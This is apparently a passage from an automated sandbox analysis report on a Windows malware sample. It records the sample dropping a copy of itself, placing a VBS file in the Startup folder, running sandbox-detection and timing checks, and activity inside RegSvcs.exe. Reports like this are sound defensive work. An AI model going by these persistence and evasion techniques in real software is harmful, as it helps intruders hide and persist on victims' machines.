Source: PsBygexGwH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PsBygexGwH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PsBygexGwH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PsBygexGwH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PsBygexGwH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PsBygexGwH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000006.00000003.2997844990.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2997193126.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3128087132.0000000004290000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3129130563.0000000004120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000006.00000003.2997844990.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2997193126.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3128087132.0000000004290000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3129130563.0000000004120000.00000004.00001000.00020000.00000000.sdmp

Source: PsBygexGwH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PsBygexGwH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PsBygexGwH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PsBygexGwH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PsBygexGwH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_001242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001242DE

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00140A76 push ecx; ret	0_2_00140A89
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E0A76 push ecx; ret	6_2_002E0A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_008E9770 push esp; ret	7_2_008E9771
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_04F7234A push edx; ret	7_2_04F7234B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00AF9770 push esp; ret	10_2_00AF9771

Source: C:\Users\user\Desktop\PsBygexGwH.exe

File created: C:\Users\user\AppData\Local\directory\name.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0013F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0013F98E
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001B1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_001B1C41
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	6_2_002DF98E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00351C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	6_2_00351C41

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep			graph_0-99308
Source: C:\Users\user\AppData\Local\directory\name.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 6_2_002CD010 rdtsc

6_2_002CD010

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599721	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594279	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594158	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
